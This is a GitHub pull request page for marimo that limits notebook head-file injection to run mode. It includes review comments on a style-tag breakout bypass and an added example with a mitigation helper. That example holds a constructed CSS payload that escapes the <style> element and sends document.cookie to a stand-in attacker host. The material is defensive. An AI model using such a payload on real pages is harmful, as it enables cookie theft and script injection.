
fix: restrict head_html to run #9137

Merged
dmadisetti merged 2 commits into main from dm/disable-just-html on Apr 10, 2026

Conversation

@dmadisetti
Collaborator

📝 Summary

Copilot AI review requested due to automatic review settings April 10, 2026 18:46
@vercel

vercel bot commented Apr 10, 2026

The latest updates on your projects. Learn more about Vercel for GitHub.

Project: marimo-docs
Deployment: Ready
Actions: Preview, Comment
Updated (UTC): Apr 10, 2026 6:48pm

Contributor

Copilot AI left a comment

Pull request overview

Restricts per-notebook html_head_file injection so it only applies in SessionMode.RUN, preventing arbitrary head markup/scripts from being included when a notebook is opened in edit mode.

Changes:

  • Gate app_config.html_head_file injection behind mode == SessionMode.RUN in notebook_page_template.
  • Add tests asserting: CSS file injection still works in edit mode; html_head_file is blocked in edit mode and allowed in run mode; global html_head is still allowed in edit mode.

Reviewed changes

Copilot reviewed 2 out of 2 changed files in this pull request and generated 1 comment.

File | Description
marimo/_server/templates/templates.py | Adds the SessionMode.RUN guard for html_head_file injection in notebook_page_template.
tests/_server/templates/test_templates.py | Adds regression tests covering edit vs run behavior for css_file, html_head_file, and global html_head.

Comment on lines +326 to 330
# html_head_file is blocked in edit mode: it can contain arbitrary scripts
# and markup that could exfiltrate data or redress the UI. CSS-only styling
# (css_file) is permitted. Run mode is unaffected.
if mode == SessionMode.RUN and app_config.html_head_file:
head_contents = read_html_head_file(
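Review bot: the comment above the guard asserts that css_file is "CSS-only styling" and therefore safe to keep in edit mode, but nothing in this hunk enforces that property; the guard only touches html_head_file, so the claim depends entirely on how css_file contents are inlined elsewhere. Either reword the comment to say css_file is still trusted in edit mode, or pair this change with a check on the css path so the comment is true. Separately, `if mode == SessionMode.RUN and app_config.html_head_file:` silently drops a configured head file in edit mode; a log line at that branch would save notebook authors from wondering why their head markup disappears in edit but not in run.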

Copilot AI Apr 10, 2026

The new comment implies css_file is a safe “CSS-only” alternative in edit mode, but _custom_css_block() inlines CSS unescaped, so a malicious CSS file can break out of the <style> tag (e.g., by including </style>), allowing arbitrary HTML/script injection in edit mode. If the goal is to prevent untrusted notebooks from injecting scripts in edit mode, consider either sanitizing/escaping style contents (at minimum neutralize </style sequences) or applying the same mode restriction to css_file as well; otherwise the html_head_file block can be bypassed via css_file.

Copilot uses AI. Check for mistakes.
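To make the bypass described in the review comment above concrete, the following is an added example and not marimo's code: `naive_css_block` and `safe_css_block` are hypothetical stand-ins for the page's `_custom_css_block()`, the stylesheet is constructed, and the detector uses only the standard-library HTML parser. It shows a "CSS" file that closes the `<style>` element to land a `<script>` in the page, and the mitigation the reviewer suggests: neutralising the breakout by CSS-escaping `<` so that no `</style` sequence can survive inlining.

```python
from html.parser import HTMLParser

# Constructed sample stylesheet (not from the project): ordinary CSS, then a
# </style> breakout that injects a script, then a reopened <style> so that the
# template's own closing tag still pairs up and nothing looks broken.
MALICIOUS_CSS = (
    "body { color: red; }"
    "</style><script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>"
    "<style>"
)


def naive_css_block(css: str) -> str:
    """Hypothetical stand-in for unescaped inlining: file contents dropped verbatim into <style>."""
    return f"<style>{css}</style>"


def safe_css_block(css: str) -> str:
    """Inline CSS without letting it terminate the <style> element.

    An HTML parser treats everything inside <style> as raw text until it sees
    '</style' (case-insensitive), so the only character that can end the element
    is '<'. Replacing every '<' with the CSS hex escape '\\3c ' (the trailing
    space terminates the escape) keeps the stylesheet meaning identical while
    guaranteeing that no end tag can appear in the inlined text.
    """
    escaped = css.replace("<", "\\3c ")
    return f"<style>{escaped}</style>"


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees; any tag other than 'style' escaped the element."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def elements_in(fragment: str) -> list[str]:
    """Return the start tags an HTML parser sees in `fragment`, in document order."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def css_breaks_out(css: str, inline) -> bool:
    """True if inlining `css` with the given helper yields any element besides <style>."""
    return any(tag != "style" for tag in elements_in(inline(css)))


if __name__ == "__main__":
    # The naive helper hands the browser a live <script>; the escaped one does not.
    print("naive:", elements_in(naive_css_block(MALICIOUS_CSS)))  # → ['style', 'script', 'style']
    print("safe: ", elements_in(safe_css_block(MALICIOUS_CSS)))   # → ['style']
```

Escaping rather than rejecting keeps legitimate stylesheets working unchanged (a file with no `<` is passed through byte for byte), and it is independent of the session mode, so the same helper serves both edit and run. If a project prefers to fail closed, the same `<` check can instead raise before the template is rendered.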
@dmadisetti dmadisetti added the bug Something isn't working label Apr 10, 2026
@dmadisetti dmadisetti merged commit e1adaa0 into main Apr 10, 2026
42 of 45 checks passed
@dmadisetti dmadisetti deleted the dm/disable-just-html branch April 10, 2026 18:56
@github-actions

🚀 Development release published. You may be able to view the changes at https://marimo.app?v=0.23.1-dev21
